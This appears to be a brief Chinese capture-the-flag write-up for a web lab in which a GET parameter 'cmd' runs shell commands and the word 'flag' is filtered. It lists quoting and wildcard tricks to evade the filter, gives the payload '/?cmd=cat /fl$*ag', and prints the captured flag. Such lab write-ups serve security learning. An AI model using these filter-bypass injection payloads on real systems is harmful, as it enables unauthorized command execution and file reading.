开启靶场,打开链接:
GET传参cmd,且对flag字符串进行了过滤
用\*绕过,fl*ag
用'绕过,f''lag或f'l'ag
当然还有别的方法绕过,就不一一赘述了(已经写了文档了《过滤绕过方法》)
/?cmd=cat /fl$*ag
成功得到flag:
NSSCTF{132e1f48-9cc3-4a6f-8608-91f32a8fa6f6}
相关推荐
zhu12893035562 小时前
网络安全与防护策略viqecel2 小时前
网站改版html页面 NGINX 借用伪静态和PHP脚本 实现301重定向跳转virelin_Y.lin3 小时前
系统与网络安全------Windows系统安全(1)zhu12893035564 小时前
网络安全基础与防护策略jingshaoyou5 小时前
Strongswan linked_list_t链表 注释可独立运行测试小爬虫程序猿6 小时前
利用 PHP 爬虫按关键字搜索淘宝商品小爬虫程序猿6 小时前
淘宝商品信息如何存储到数据库?鹅肝手握高V五色7 小时前
Wireshark入门教程:如何抓取和过滤网络数据包sszdlbw8 小时前
BUUCTF-web刷题篇(6)nixiaoge9 小时前
RCE漏洞